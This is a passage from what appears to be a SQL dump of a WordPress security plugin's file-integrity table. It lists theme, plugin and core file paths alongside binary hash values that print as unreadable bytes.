�o�ny�w�','',0,'?'),('�P��E7�yv��*�7','wp-content/themes/newsmag/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[��?�ꦨqq�R','L`��X(��g�&��.�c;S��]Z2aV:�L','',0,'?'),('�0���զ����','wp-content/plugins/wp-cerber/assets/flags/gw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*qWM����f2�c','d�n�;L�m%��\"NA�oZE!���J�_͆�','',0,'?'),('��>�/ᡇ_����','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l([qא��D#��','\\sٶ�hb�2.;�m`F��r^&�H-w �yV�~','',0,'?'),('�&UX\r�L4{����','wp-includes/js/utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��0�`ߣ���MVi`','�js�@Vna�v�t\'ȀD��,݆���T;','',0,'?'),('��ԞX�[�`?��^','wp-includes/block-patterns/large-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`���3��\0�]j6?>','��b�`&h�2��)V�KF}Ո�m�?*f�搭','',0,'?'),('\Z֧��\\\Z�h�i','wp-includes/js/dist/blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|@^f^,x2�B�� ','��J��r°�gȫ~�H�?pX���T���\\п�M','',0,'?'),('\ZO�3F5K�;�@ �','wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�q\\�}����[�','�[�T�n�Ejd�(�$�:!�h�Ν\0�s�><','',0,'?'),('\Z&�cR�< FiC�','wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƥܐ�W^�[�g�','�dL�����cK~=0jE�]�����~\"�','',0,'?'),('\ZL�MS~�d�,T�7��','wp-includes/wp-includes/images/media/code.png',0,'-o��Uʓ��U�U_','-o��Uʓ��U�U_','\'eM a[R#q2��kz�+*<�����7\0��j','',0,'?'),('\ZN\Z�`i̳%�ج0','wp-content/plugins/wp-cerber/assets/flags/cn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A���-V�|֬S���','j�_�\r49�>�x+E�X��H��dF���K�`','',0,'?'),('\Zn�8x]t����U�>�','wp-includes/wp-includes/wp-diff.php',0,' ��-x�<�z^�Wet',' ��-x�<�z^�Wet','�a��;�ɺ��*2Z��f1��\"�\n�Nt~�>��','',0,'?'),('\Z\Z��L�X�?T鍦','wp-content/themes/twentytwentyone/assets/images/young-woman-in-mauve.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̦\\����l��G?','�;�}pSy���,7sa.�T��ˌO1q\'�5[��~','',0,'?'),('\Z��_eym�\Z�v��/\\','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�LgD5w\'|�IGV��5','�}њ@�PF�)M���$��j���p{e','',0,'?'),('\Z�����L6N�1�;8�','wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"���w^\n���k�6','�!�5�@�a�6t�o�5(D�s���\n��K�f','',0,'?'),('\Z�\Z!@%�U�鏂�Yq�','wp-includes/wp-includes/js/dist/block-serialization-default-parser.min.js',0,'ZZb&\'���C����','ZZb&\'���C����','���{���E�#G�`T`��4��4ܯ��','',0,'?'),('\Z��� 1�/c���:!','wp-includes/wp-includes/SimplePie/Cache/MySQL.php',0,'�) ��fz���C�0�','�) ��fz���C�0�',' ��W��A��2Lh�`���i�%iv�2���','',0,'?'),('\Z�;5�(��O�O�R�','wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ǜ����lm�D!','�\'�9�\r9�\0o|��\Z������|����0K','',0,'?'),('\ZŴԭ�xvw�E\nv','wp-content/plugins/wp-cerber/assets/flags/mk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x���Zx��e��','Ŷv�ew��s��֝�wx�YԌ[@eQ�C�j','',0,'?'),('\Z�)�@��~�|Muհ�','wp-content/themes/advance/inc/kirki/assets/js/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���et���ؖ��','|]��yX�E��G�@��w!2��Ѣ�(','',0,'?'),('\Z�`��c�\"�q]��\'O6','wp-content/plugins/wordfence/js/wfi18n.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i&XDE���p/N�','GU ��*��k�P,�:�?+}x�Hb�5���#�','',0,'?'),('\Z�v���M_�6p�ue�','wp-includes/wp-includes/css/dist/components/style-rtl.css',0,' ��y�T�����&]H|�',' ��y�T�����&]H|�','RU\Z����[�^͝�/��a��/�9�\0�x��','',0,'?'),('\Zٿ��Uu��.','wp-content/themes/anima/admin/images/1c.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Yo���rH��5�Bp','�HQ�x��L<4*8碖S���~�Pb�\Z��;E%','',0,'?'),('\Z�>��XZP�r*���','wp-content/themes/newsmag/inc/admin/welcome-screen/css/welcome_customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�����a��v�','����j�\r?A��G�X��s?}�7Z�ZV','',0,'?'),('\Z�Z��a�84��ǵ','wp-includes/wp-includes/js/dist/blob.min.js',0,'eLi���7�Mq\nk��','eLi���7�Mq\nk��','ZF�}��bgHCk��]��`�E|k�nW�','',0,'?'),('\Z��{l46-��jT99','wp-content/plugins/wordfence/js/knockout-3.3.0.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_��B8lc^��','5�J�9h��ALg��@�`�uw�o��3��\0I>','',0,'?'),('\Z����)qtsCI9','wp-includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�����8�B��=^�','�u���6`�8ԻJLM��|�.�m�O5','',0,'?'),('\Z�r��Nl��\'��7M�','wp-content/themes/sg-window/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ů��g(v�� /','�B��Ta��).���5�������ŕ������','',0,'?'),('\Z�y��8R#O�y��','wp-admin/css/nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+f~�Da�أv|�/�','%tK�r���t��M��b��n:�a����>E','',0,'?'),('\Z��*����7O�4JB�','wp-includes/wp-includes/Requests/Hooks.php',0,',�� ���gx�i���',',�� ���gx�i���','�՚���� Q�憐D�P��_?y�`�����','',0,'?'),('\Z�ψ��Kr�|�s�$','wp-content/themes/wp-barrister/library/images/custom-post-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��x��7��\0=zME','Y���%U�Z��.$O|c6��n:��\"5a1','',0,'?'),('\Z��\Z:\\��Rf�P�~3','wp-includes/class-wp-metadata-lazyloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I^�P���;$�+\"�','^2��)E>X���4�:��U&�߳;���!e','',0,'?'),('\Z�UE�s(��#E�p','wp-includes/images/smilies/icon_mrgreen.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$_��u�X|I%~$','!B���I1�mV�-���|ј�X5D�8���h�','',0,'?'),('\Z���/�̓��T%�g4','wp-includes/js/jquery/ui/effect-drop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���閴�u)�B���1�','��v��h��d���L�V�y�^n\"�ّ\0]p�','',0,'?'),('Ҿ�x�P;�+2�/�?','wp-includes/wp-includes/js/jquery/ui/effect-shake.min.js',0,'1�̎�X�!��-�U��','1�̎�X�!��-�U��','�.��,�e=~[�Y�p�x�\"��o�?v��#��','',0,'?'),('cQb��K���G��','wp-content/themes/auberge/library/controls/class-WM_Customizer_Hidden.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڙ ��FԴ�\nީp��Y','q*մR�-�z��Z��?�.�x�[+�u�q���','',0,'?'),('$�P�`��\0g�X�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yF\\����2���','2k�s��\\>��RI:nH�ȿDm�!zz���','',0,'?'),('(�řB���LZ��','wp-content/themes/Endolf/inc/paginate.php',0,'$Nb�KI�Z)��*��w','$Nb�KI�Z)��*��w','�h���?��Mq��L���i��h��]L��','',0,'?'),('-��c�<���@�VsZ�','wp-includes/js/api-request.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����߿G7p6{�g','�d�6Q\\����f�:�����G`��j1V�','',0,'?'),('3`���{���c��c�','wp-content/themes/hueman/assets/front/js/_parts/_main_xfire.part.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"KD���c�[2�S',')_�5u\\��I�^��rI\r/I�$\"{(�','',0,'?'),('C�(�4�C���c�','wp-content/themes/wp-barrister/library/images/arrow-bullet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͷ�H��FY`Ȕ��','�f����`����ՠ:�7P!\"-�r/$�3�','',0,'?'),('Ryr�|���o>���>','wp-content/themes/twentytwentyone/assets/css/style-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c*�ΌƝ�+�Wi�','�W/�����%=M]ZX�>\n>.\0x�5#^��','',0,'?'),('k����7|d����T;','wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�t�J��?&B�I�_�','D*��\nS��A�w��5e�\Z��ӔM2���','',0,'?'),('m;��}b�BLז^�7','wp-content/themes/hueman/assets/front/img/demo/2-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)](4$�3y��\'','X���\\�G\n]�d�gו���u�/���J�','',0,'?'),('��{!WX�;Q�^<','wp-content/themes/capacious/assets/css/owl.theme.default.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��~�\\�B�*�[�','ꈇK�~�\r�)n%�e\0��IL?�<$��\"c','',0,'?'),('��<_zˁ���>㝄','wp-includes/wp-includes/random_compat/random_bytes_dev_urandom.php',0,'��d�����\ZHr�','��d�����\ZHr�','\nDfdvP�f�On:����a��г���X�','',0,'?'),('����Eӆ�Z���{','wp-content/themes/auberge/template-parts/content-food-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@����U1���W�,','���ڧtt�n��c����{��','',0,'?'),('����[��+���','wp-content/themes/vision-lite/full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h]9SI�O4����Sj�','��SI��KU����遖:i�/CnU','',0,'?'),('����DBUK\0��}�','wp-content/themes/travel-stories/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�5��#N�W)5�','\'�<���$y \0qP��_����� ]W!��','',0,'?'),('�\0��R�Џ�Ykb��','wp-content/themes/advance/inc/kirki/assets/js/controls/spacing.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*F��xv�z����','N�Jc\"�-S oc(�P(�d������H~;','',0,'?'),('�y���!�\0pZ�[A','wp-includes/js/mediaelement/mediaelement-and-player.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�iz+*;)��E�','�-5(��:�oQ[̪���\\�\nm~�CP','',0,'?'),('�s��=����\0','wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89�\"��zz��Vv*��]','�ۆ%%l�:J�f<�bq��P���Pt˯}ߝ\"�f','',0,'?'),('��E�ȖqȊ?2�H�','wp-includes/js/dist/api-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y���p���n���/5','�4/�W~s U��9i@w�C�O\"4���','',0,'?'),('��<b���!�','wp-content/plugins/wp-cerber/assets/flags/ge.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Aw�J#ܿ�d��F','��6��o�M�X��ݕ�D���֖M�+','',0,'?'),('Dz���Kb�d\0G�7��','wp-content/themes/skt-pathway/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĥa@�m��8���u','�� nr��O*Xc�\n�N���吩�X����','',0,'?'),('�a���= Cة�\'�','wp-content/themes/skt-pathway/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��8�Ki�^��i�','��0\"{�N��.��3�z�?EV�C�� ��','',0,'?'),('ֻE\n�<�B�[�,','wp-includes/class-wp-ajax-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6�)�Q�\"Sσt�.H�','��[��$���g�nM!^\\���9t�t��>Z�','',0,'?'),('��Y�Ab�))�O�s','wp-includes/wp-includes/sodium_compat/src/SodiumException.php',0,'�HDf��ae���z��R','�HDf��ae���z��R','㶜\\��L>L�N-@G\'��tmG��i��kR߮g\0','',0,'?'),('���(l�8y\n&','wp-includes/wp-includes/css/dist/editor/style.min.css',0,'հv��}�Ifs��>�','հv��}�Ifs��>�','�J����Tc68H�\Z�s\'9]�6�p���4d','',0,'?'),('�0lw��II�Q�\n','wp-content/themes/wp-barrister/library/js/modernizr-2.6.2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�Y��Q`Tq�1[','�p�>�8ŃR\0:��S��;�G~���nH�5G:�','',0,'?'),('�m��n9�F�6�','wp-admin/css/admin-menu-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i�0.���f��','C�X�R�\Z��)GU+LA�� �$�:�1�e�','',0,'?'),('�k�GzA$\\&4*-\r�','wp-content/themes/spidermag/spidermag/customizer/sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�^ipz����ON�','|\'�}��Չ;g�VЅ#�pw��`��sg�','',0,'?'),(' �u�R��@��WW��','wp-content/themes/newsmag/assets/sass/navigation/_socials.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R�#6�����Z��','\Z���z��Y(�u���g�}��]���7��/','',0,'?'),('#��Υ���<\":��2','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-radio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;1�4�7� >!s\0.','�{p��۹�\0�YںC8h3$�~z�d����','',0,'?'),(')�M��^�ûoz�','wp-admin/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�ל�x>c������¢','�<\0Ѕҩ��هqU%��G��7r�\\�*��2J','',0,'?'),('.�c\r��xz�-�c=�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',0,'Ջ}��B��H��71','Ջ}��B��H��71','��\"�beTb�$�����\n���~�ln��','',0,'?'),('3�4�EF!EFc��Y�;','wp-content/themes/maxbusiness/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%}t���}H���6','�c��V��p����V��Zj��(�)��b�','',0,'?'),('4%�IH�O��ʰ�L','wp-includes/css/media-views.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�\0�]������ �-','�{&B>�:]�\n��a��m����c�[zk!�','',0,'?'),('<B��ʱ�A51ӱ','wp-content/plugins/akismet/_inc/form.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�4�l*��&��i','�MB�1�QwoX4bx��c)@D�˥��k','',0,'?'),('C�/�;)��ّ�o','wp-admin/js/comment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xc�T��#�Δ�(�','�Pi<l��D%�J{d�w�������5/','',0,'?'),('H��~�\n��x����|','wp-includes/js/dist/token-list.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��͒V�&8\07X','FEb+��`��\\Ձ��� �4�]D�s�}�\Z','',0,'?'),('T�gslF��ʞ�Ly','wp-admin/js/set-post-thumbnail.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�P�N�H�9e�@I','e}#����n�q�J�rJ��Q<d��Z�K�4','',0,'?'),('Y ����S��z�X^','wp-content/plugins/wp-cerber/assets/flags/bj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��̂(,�ߨP}r��','�` �U�Y�ģ���Ç�/�5��T��\"5','',0,'?'),('a�@�WrQw��Z\n.�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܑz�g<N��\n?o6f','���R����Eg�X3��JAc��!a�_��S{','',0,'?'),('fSv��iKlA�W)�KB','wp-content/themes/travel-stories/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S($�}(��+��\Zb','&4�?�@7Y��y>�9;��h�w� �%p\"�P','',0,'?'),('z�|*6�S\\5��3','wp-content/plugins/wordfence/lib/wordfenceScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l2�Ǘ�yf[CZ߈G','H�mb�(���f�>MX��=�W��|��ٿx','',0,'?'),('{mt+.\'\r���:�*','wp-includes/wp-includes/css/editor.min.css',0,'p^�,f�ޡ�����I{�','p^�,f�ޡ�����I{�','��i�4�j�v�J5�d���߲TP��L�/��7�','',0,'?'),('��w.(s<��#�5*','wp-content/themes/wp-barrister/library/images/bullet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m���R�2���d','�2�а�����^3d�o]`��]_u7Z�','',0,'?'),('�x�hs^dƐ�%','wp-content/themes/newsmag/inc/widgets/popularposts/class-widget-newsmag-popularposts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D)�G��A��;�','q�q�x�>p1-V�G]����~��k2��','',0,'?'),('�&_�\\l=��L���','wp-includes/wp-includes/Requests/Exception/HTTP/416.php',0,'�1�N9�ɪ�a�Dx�','�1�N9�ɪ�a�Dx�','�(��mybV�aI�jWp���(!A����<(�X','',0,'?'),('�Ʒ4�/�;����','wp-includes/wp-includes/js/dist/api-fetch.min.js',0,'B��p=(mV�2��_a','B��p=(mV�2��_a','G�y���л\r��7�5���d������R��','',0,'?'),('�\n$z�X�`�1Bw','wp-includes/js/tinymce/plugins/charmap/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��5^����','[�B�\Z,;��j�fe�MU�j|)�rv��>U�F','',0,'?'),('��=b�6��hs���t','wp-admin/ms-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:1R] l�I��!#_J','7�E��H����Pu�����Z�b��G','',0,'?'),('�\"q���(���͏Uou','wp-content/themes/skt-pathway/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�ï\"I��\n���','�o�\0Cj���\ZM�;2�D���\r�2 ����','',0,'?'),('��\'��FE�A�vQMv','wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\r��5]xVI�\'�i�','��G��݅\'�!���Y�E�3��P5ad��M��','',0,'?'),('�����>����p�\rB','wp-content/themes/twentytwentyone/assets/sass/06-components/pagination.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�N#vk�s��z','w;�[f�]X��Þ&�����y2,����F','',0,'?'),('�^�u[�p}`B��W1','wp-includes/blocks/table/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����̀)#\rS� ��','�q#�.Z!�g�l���讍T�\0�u�\'EA�?�','',0,'?'),('�$��bQ\'�n�0?','wp-includes/wp-includes/block-patterns/three-buttons.php',0,'��ǟ�( aL�)�m','��ǟ�( aL�)�m','\r��)��k���O�dS0�X�z���_����','',0,'?'),('��Nk��DR���ng#�','wp-includes/wp-includes/widgets/class-wp-nav-menu-widget.php',0,'�8x$�9�hQ&�','�8x$�9�hQ&�','n~��B�Ȳ���|�4�[�U�`\0�2�J۷�','',0,'?'),('��º��\06�R&q','wp-content/plugins/wp-cerber/assets/flags/lc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?x2\Zˁ%��*�','��dV��d����5�w$�E�,Ư�{l','',0,'?'),('�n��(�}g��V뇔','wp-content/themes/event/inc/customizer/event-default-values.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ę���F���?��F�','�g�!� �R����:�J�0�nd���{�;Vs�B','',0,'?'),('�k0B��a��`�','wp-includes/customize/class-wp-customize-nav-menu-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�#Y�bu3�����','�Ӻ�f����\r���o!�cY �o��\r����','',0,'?'),('ػȯ�S#���yj','wp-includes/wp-includes/sodium_compat/src/Core32/SipHash.php',0,'�5O&?��E� ��%','�5O&?��E� ��%','^%%�hT��,�����k2�Ȯn=n%:��','',0,'?'),('����^�cm]�s~','wp-content/plugins/wp-cerber/nexus/cerber-nexus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ced]@�>�t�Ɇ��','JSu�j�F#�e��҇p�U�a�;�S�','',0,'?'),('�\r)�51T�� ��o','wp-content/themes/twentytwentyone/inc/block-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t@/�ߢ�@e��R','��r�4����w�����zZ�Z�S$�','',0,'?'),('ܟ�ҿB∶����','wp-includes/js/dist/media-utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UJ҃�iOķ}��`�','Ҋ���M�#,���HӬ\\f�C|xn���W:','',0,'?'),('�-=Q�Cw�tnL�#','wp-content/plugins/wordfence/lib/wfBrowscap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r�e.�����b��','�Hz�n���O�#�/�t�ɚ\"���U ���A�i�','',0,'?'),('� � !��m�f���&','wp-content/themes/spidermag/assets/library/magnific-popup/js/jquery.magnific-popup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[#��;jc�t�=�','�{Il�B|<�Ĩ�@Z\'�k)y��_E��Զ����','',0,'?'),('�.+�z�OO��%j8g','wp-content/themes/advance/inc/kirki/includes/class-kirki-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�m8 �R�Dj���,','\"�+�v1�;�<���M_G���;=tD�%i`$','',0,'?'),('�CN#��ĔB����','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color-palette.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0���\Z����O','��K�!�l�̞�<�w�G �x6����A\0fj','',0,'?'),('�N�đG�����','wp-includes/wp-includes/sodium_compat/src/Core32/HSalsa20.php',0,'��/Dzx��ǂ��','��/Dzx��ǂ��','���,�����E���{��0/m�a�X�i���','',0,'?'),('0� \'i�DZ&L%�','wp-content/themes/event/js/source/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����#+t\r�zA','C��@�|g������8r���>�;Ò��+(t��8','',0,'?'),('\n��O�_��;]/^��','wp-includes/images/down_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V�~�o�YnG~_u','��h�8ɧ���p�u�{�9������J���','',0,'?'),('ν�}�V�+�tB�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��꤀�x�٠�%�cl','N�8,�c����ae����Οi<5p$���','',0,'?'),('G_bc�.,]&���','wp-admin/js/image-edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\'�L�\n�r�)�L','o9J�B�{2[�Je\r����@q��ؘ�Դ�lD�','',0,'?'),('Kv�$T�MR����=�','wp-includes/css/dist/edit-post/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����n �VQ�H��','Y��^�Up���yx.ΕP��\0���\Z�����','',0,'?'),('J�*\\,R�ģ�}j','wp-includes/wp-includes/widgets/class-wp-widget-media.php',0,'�m�����O���\\��','�m�����O���\\��','�b�Z�r��A��{�_���d���5|','',0,'?'),('}ƿ߲��2�P���','wp-content/themes/sg-window/taxonomy-jetpack-portfolio-tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ޙNׯ&IQ{sm�� �','�����2��6�8�̓�-�A���̈7� ���','',0,'?'),('&�\\�Xukq�)��/','wp-content/themes/sg-window/img/icons/small/wordpress.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nz����m�2�a`��\r',']}��A�&��-yæ=\Z]v\"�Y�ES{�.5','',0,'?'),('-h��a��QR�J|`�','wp-content/themes/wp-barrister/content-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y��f[c��\'�','�-��$��nx�H�(4���!˖\"u=^�y���','',0,'?'),('26��{�m�K� ','wp-content/themes/advance/images/ico-delete.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hF�|�Ưxdg_+','~qz4���E��=��G<����c yA���UG�','',0,'?'),('2J0���xYr���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�Q[릶������','�)�t1��@�1\0��ו����KW���\0���','',0,'?'),('@[�8`hk4����h','wp-content/themes/auberge/assets/css/welcome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NS#�1^ʄ��','�G�ݺ�Ya��:���&�w�W�`eXj5��','',0,'?'),('Kg\Z�P�F\\�,�f','wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),('\\IvP5�Xc������','wp-content/themes/travel-stories/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�i�FJMY9�%���Q','e4/\\EWH����{�*n�C2�k/Y��z�c�','',0,'?'),(']���(�7�^����U','wp-content/plugins/wp-cerber/assets/flags/zw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�^�~����E,Tl','S��Y�2�r�5��S�a�J�\"��tJ�@ArC�','',0,'?'),('b��\n�r��\\,+','wp-content/themes/advance/inc/widgets/ourclient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sY\\��L����^ p','+���z)J)�%_n���e�/-��%Tr��','',0,'?'),('fMx��� �+9�U�','wp-admin/js/customize-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|���\Ze�+J~','��h��v�ԲF:�Zؿ�Bd`����Y���','',0,'?'),('l��g.N��\ZK\Z�-','wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js',0,'9\'�Q8b�/����a�','9\'�Q8b�/����a�','�3t\\R>��_a��>�\0��|ՑVC�䦇OB','',0,'?'),('o?*a���ni���\n','wp-includes/wp-includes/canonical.php',0,'��G��o<����ݏ�','��G��o<����ݏ�','����1\r�eɓ�������Y宒^zՒ=�F�1','',0,'?'),('t��nN�����ȹ�f','wp-content/themes/maxbusiness/templates/fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�����>�b�\0gL','�غ�dW��p���%|9�|�k����M��','',0,'?'),('v`�D\\\r;ǒ�h�2','wp-content/themes/sg-window/img/icons/delicious.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����jK��<!�z��k','e�.w�vͭK��K���N�l�R,�$�<W1��','',0,'?'),('{���R��^�7�','wp-content/themes/cactus/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+y�Za��N}&�1��\r,','>{d}�8��5\0Jy�}\0�9n�)�j�~Yg䂼�','',0,'?'),('��a�x� ����g�','wp-content/themes/auberge/template-parts/content-custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#���|�>�<����','�Yk{H���r��\Z�ٷ�͓ӗ�^�c���','',0,'?'),('��Ϧ��k���iIY','wp-content/themes/vision-lite/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M �!��T�`��[��R','F���ٶ����cf�h�3�h�7ML!��E�','',0,'?'),('�%�S�E�u� ��','wp-content/themes/hueman/assets/front/img/demo/6-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J;������,�\0�3','�eza���\r��.�����ޘ�e�Zу','',0,'?'),('�%��\\��MA����','wp-admin/images/wordpress-logo-white.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qP�C��-SPD�','e�4�E��?�&�DsA���ʬ�;�)@�Xɒ','',0,'?'),('����J�}F��E\0�9�','wp-content/themes/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~ 